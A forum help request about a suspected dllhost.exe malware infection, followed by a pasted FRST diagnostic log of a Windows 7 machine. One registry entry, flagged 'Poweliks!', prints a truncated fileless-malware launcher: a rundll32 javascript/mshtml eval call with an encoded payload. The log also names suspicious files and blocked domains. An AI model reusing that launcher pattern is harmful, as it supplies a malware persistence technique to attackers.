
dllhost.exe virus and Its Insatiable Hunger for Using RAM and Creating Malwarebytes Notifications


Vitharr

As do its lesser-known, yet still just as annoying, siblings dllhst3g.exe and dpnsvr.exe. All three processes have been spotted running on this computer. The latter two appeared for the first time that I've seen after scanning with Malwarebytes Premium and uninstalling Microsoft Security Essentials, which I'm starting to believe was not the best thing to do... Also, those two very processes were both running at the same time dllhost.exe was, and when I ended dllhost.exe, the former processes both ended, as well. Coincidence? I THINK NOT!

I am also getting constant notifications that an outbound connection has been blocked, going to such trustworthy sites as fff5ee.com, film-site.org and, my favourite, a blank.

The dllhost.exe thing had been going on for some weeks, now. Thought I just goofed something up, and after not being able to fix it, got your program to try and salvage this computer. Scanned in safe-mode and found that a plethora of crap was calling my computer home, yet this still continues. I saved the log of the stuff found during the scan that was removed, and I have .png files of the notifications that are now constantly popping up, via snip-it captures, if they are requested. I also have run FRST, like stated, and have also run GMER and TDSS-Killer, without modifying anything. Just getting as much info from .txt files on here so that the unlucky fellow who decides to attempt to help my sorry butt can come to the conclusion that I'm screwed more rapidly. I'm pretty sure my computer's infected with Ebola.

An update while writing this. My computer began to run slow, so I went to go chop off the exposed head, and saw three new processes I did not recognise. All three died when dllhost.exe was slain by yours truly.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014
Ran by Calahan (administrator) on HP8100-2 on 10-11-2014 22:57:24
Running from C:\Users\Calahan\Downloads
Loaded Profile: Calahan (Available profiles: Mike2 & Logan & Elisa & Calahan & Administrator & Guest)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
() C:\Program Files\Plantronics\GameCom780\GameCom780.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(GlavSoft LLC.) C:\Program Files (x86)\TightVNC\tvnserver.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\SnippingTool.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
() C:\Users\Calahan\Downloads\nffvqpeh.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7938080 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [196648 2009-06-03] (ActivIdentity)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [483880 2009-06-03] (ActivIdentity)
HKLM\...\Run: [GamecomSound] => C:\Program Files\Plantronics\GameCom780\GameCom780.exe [777448 2011-12-01] ()
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [iMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [111640 2009-11-04] ()
HKLM-x32\...\Run: [File Sanitizer] => C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exe
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [tvncontrol] => C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)
HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [54072 2014-10-01] (Malwarebytes Corporation)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55360 2014-06-24] (Raptr, Inc)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [HydraVisionDesktopManager] => C:\Program Files (x86)\ATI Technologies\HydraVision\HydraDM.exe [380928 2009-10-19] (AMD)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\Overwolf.exe [39712 2014-10-22] (Overwolf LTD)
HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Folding@home.lnk
ShortcutTarget: Folding@home.lnk -> C:\Program Files (x86)\FAHClient\HideConsole.exe ()
Startup: C:\Users\Mike2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:Tabs
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=CMDTDF
SearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDF
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=CMDTDF
SearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMDTDF
SearchScopes: HKCU - DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = 
SearchScopes: HKCU - {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} -  No File
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\BelarcAdvisor\System\BAVoilaX.dll (Belarc, Inc.)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.76.76 75.75.75.75 192.168.3.1
 
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Calahan\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2217723503-548262416-3983414958-1007: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll ()
 
Chrome: 
=======
CHR HomePage: Default -> 
CHR StartupUrls: Default -> ""
CHR Profile: C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-31]
CHR Extension: (AdBlock) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-11-05]
CHR Extension: (Google Wallet) - C:\Users\Calahan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-14]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
CHR HKLM-x32\...\Chrome\Extension: [ogccgbmabaphcakpiclgcnmcnimhokcj] - C:\Windows\SysWOW64\jmdp\SweetNT.crx [2014-07-14]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [277032 2009-06-03] (ActivIdentity)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-04-07] (Hewlett-Packard) [File not signed]
S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [997664 2014-10-22] (Overwolf LTD)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-04-07] (Hewlett-Packard) [File not signed]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [75136 2014-02-28] ()
R2 tvnserver; C:\Program Files (x86)\TightVNC\tvnserver.exe [815704 2010-07-08] (GlavSoft LLC.)
S2 dwmrcs; No ImagePath
S2 HP Health Check Service; "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe" [X]
S3 hpqwmiex; "C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe" [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)
R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-10] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 NAL; C:\Windows\system32\Drivers\iqvw64e.sys [32224 2009-09-21] (Intel Corporation ) [File not signed]
R3 PlantronicsGC; C:\Windows\System32\drivers\PLTGC.sys [1327104 2011-11-04] (C-Media Electronics Inc)
S3 PTHDRBUS; C:\Windows\System32\DRIVERS\PTHDRBUS.sys [69264 2009-12-15] (DEVGURU Co., LTD.)
S3 PTHDRMDM; C:\Windows\System32\DRIVERS\PTHDRMDM.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 PTHDRVSP; C:\Windows\System32\DRIVERS\PTHDRVSP.sys [176912 2009-12-15] (DEVGURU Co., LTD.(www.devguru.co.kr))
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
U3 uxryipod; \??\C:\Users\Calahan\AppData\Local\Temp\uxryipod.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-10 22:57 - 2014-11-10 22:57 - 00017513 _____ () C:\Users\Calahan\Downloads\FRST.txt
2014-11-10 22:43 - 2014-11-10 22:43 - 00000000 ____D () C:\Users\Calahan\Downloads\tdsskiller
2014-11-10 22:42 - 2014-11-10 22:42 - 04163057 _____ () C:\Users\Calahan\Downloads\tdsskiller.zip
2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe
2014-11-10 21:14 - 2014-11-10 22:57 - 00000000 ____D () C:\FRST
2014-11-10 21:13 - 2014-11-10 21:13 - 02116096 _____ (Farbar) C:\Users\Calahan\Downloads\FRST64.exe
2014-11-10 20:59 - 2014-11-10 20:59 - 00000129 _____ () C:\Users\Calahan\Downloads\malwarebytes.txt
2014-11-10 20:30 - 2014-11-10 20:31 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads\mbam_premium.exe
2014-11-10 20:17 - 2014-11-10 20:16 - 00042070 _____ () C:\Users\Calahan\Downloads\NOV-10-14.xml
2014-11-10 20:16 - 2014-11-10 20:16 - 00000049 _____ () C:\Users\Calahan\Downloads\NOV-10-14.txt
2014-11-10 19:43 - 2014-11-10 20:56 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-10 19:43 - 2014-11-10 20:31 - 00001112 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-11-10 19:43 - 2014-11-10 20:31 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-11-10 19:43 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-10 19:43 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-11-10 19:43 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-11-10 19:41 - 2014-11-10 19:42 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Calahan\Downloads\mbam-setup-2.0.3.1025.exe
2014-11-09 23:50 - 2014-11-09 23:50 - 00003056 _____ () C:\Windows\System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500}
2014-11-05 16:54 - 2014-11-05 16:54 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\BMMCegjc
2014-11-04 16:36 - 2014-11-04 16:36 - 00000000 ____D () C:\Users\Calahan\AppData\Local\FalloutNV
2014-11-04 01:12 - 2014-11-04 01:12 - 00000000 ____D () C:\Users\Calahan\Documents\Activision
2014-11-03 21:31 - 2014-11-03 21:31 - 00000209 _____ () C:\Users\Calahan\Downloads\1OVPH1R.mp4
2014-11-03 19:34 - 2014-11-10 19:38 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Coxoik
2014-11-03 19:34 - 2014-11-03 19:36 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Kudo
2014-11-03 18:39 - 2014-11-03 19:34 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-31 20:26 - 2014-11-02 21:02 - 00000000 ____D () C:\Users\Calahan\Documents\Prototype
2014-10-30 18:17 - 2014-10-30 18:17 - 00001419 _____ () C:\Users\Calahan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-29 19:50 - 2014-09-19 19:09 - 17867776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-29 19:50 - 2014-09-19 18:55 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-29 19:50 - 2014-09-19 18:50 - 01385472 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-29 19:50 - 2014-09-19 18:49 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-29 19:50 - 2014-09-19 18:48 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-29 19:50 - 2014-09-19 18:48 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 02157056 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-29 19:50 - 2014-09-19 18:47 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-29 19:50 - 2014-09-19 18:46 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-29 19:50 - 2014-09-19 18:46 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-29 19:50 - 2014-09-19 18:46 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-29 19:50 - 2014-09-19 18:46 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-29 19:50 - 2014-09-19 18:46 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-29 19:50 - 2014-09-19 18:45 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-29 19:50 - 2014-09-19 18:45 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-29 19:50 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-29 19:50 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-29 19:50 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-29 19:50 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-29 19:50 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-29 19:50 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-10-29 19:50 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-29 19:50 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-29 19:50 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-29 19:50 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-29 19:50 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-10-29 19:50 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-29 19:49 - 2014-09-19 18:54 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-29 19:49 - 2014-09-19 18:48 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-29 19:49 - 2014-09-19 18:47 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-29 19:49 - 2014-09-19 18:46 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-29 19:49 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-29 19:49 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-29 19:49 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-29 19:49 - 2013-08-27 04:01 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2014-10-29 19:49 - 2013-08-27 04:01 - 01143296 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
